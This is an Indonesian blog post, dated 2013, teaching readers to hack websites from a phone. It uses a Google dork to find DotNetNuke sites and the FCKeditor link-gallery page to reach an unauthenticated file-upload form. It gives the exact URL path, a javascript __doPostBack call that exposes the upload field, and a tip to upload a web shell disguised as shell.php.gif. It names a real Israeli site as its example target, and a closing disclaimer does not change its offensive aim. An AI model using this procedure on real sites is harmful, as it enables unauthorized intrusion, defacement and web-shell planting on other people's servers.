HACK WEBSITE DENGAN METODE GOOGLE DORK DAN DNN (bisa pakai hp yang ada operamini)

Posted by February 01, 2013 , ,


Trik ini sangat saya suka karna paling gampang. Trik ini gue dapet dari dosen mata kuliah saya sebut saja NN, sering di gunakan oleh hacker, Pernah kan ngeliat website malaysia yang dikasih bendera indonesia dan lambang hacker  indonesia yang tanda nya situs itu udh di hack ama hacker indonesia. Nah ini lah trik dasar nya, Tpi jangan di salah gunakan, Ntar malah di penjara sama pak polisi Haha.. langsung aja ya mulai ke trik :p


  1. Nah yg coba saya bahas disini adalah exploit web dgn cara hack web  melalui DNN (dot net nuke) exploit melalui hape, Bahan2 yg kita butuhkan adalah :
    Operamini browser versi 5.0 ke atas
  2. Buka operamini v 5.0 anda dan ketik di kolom google search  dorknya-> inurl:"/portals/0" And search. Nah dapet kan?? Tinggal  kita pilh target yang pas di hati.dan kali ini saya coba di situs orang  israel haha :D Taruh cursor di link target trus tekan angka 1 di keypad hape anda. Pilih open in new tab. Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab. Oh,ya untuk mengetahui gimana ,apa dan bagaimana DNN exploit itu silahkan baca : Klik disini
  3. misalkan kita dah dpt targetnya nih. Contoh site: http://fril.co.il/portals/0/cwindex.txt Seperti keterangan di Security reason di atas kita coba potong link target dan menggantinya dengan  /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx ->  http://site.com/[path]/portals/0/a.txt Menjadi ->  http://site.com/[path]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    Lakukan itu pada semua target yg udah kamu buka pada browser operamini 5.0 kamu.biar gak bolak balik copas lagi. Setelah dapet dan pasti vuln seperti site di bawah ini.
    http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx dan buka.
  4. Setelah site target di buka Pilih : file ( select a file on your site) Tunggu biar loading selesai dan menampilkan 2 kolom: kolom 1 biasanya tulisan 'root' Kolom 2 berisi macam2 file. Setelah loading  selesai hapus link di addres bar operamini kamu dan ganti dgn script di  bawah ini: javascript:__ doPostBack('ctlURL $cmdUpload','') Lalu klik  ok. Dan Crutz...crutz...crutz.. =)) haha.
    Kolom yg tadinya berisi 'root' dan 'jenis-jenis file' Sekarang ganti menjadi kolom 'root' dan kolom kosong untuk  upload file. Nah skrg tgl km upload tuh file txt yg udah km simpan di  hape km. SUCCES..! you cAn hacked a web site from mobile phone. Hasilnya  seperti ini
    http://fril.co.il/portals/0/xadal.txt <100% lwt hape Extensi file yg bisa di upload diantaranya  gif, jpg, jpeg, xls, swf, ppt, pda, doc dll. Trus apa jadinya ya jika kita upload shell dgn extensi gif,atau jpg ??
    < tanya ahlinya saja,atau test  sendiri. jangan tanya saya haha... (emote benturin kepala ke tembok) Hhhhhhh..
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new  tab. Siapkan file txt/jpg atau shell.php.gif =)) Desain dulu dr pc trus simpan di hape km. Sapa tau lampu mati atau km sedang berada di tempat  yg tdk memungkinkan untuk ol dr pc,bisa iseng2 mencoba seperti di atas
NB : SAYA TIDAK MENGAJARKAN ANDA UNTUK JAHAT INI HANYA SHAREING ILMU :))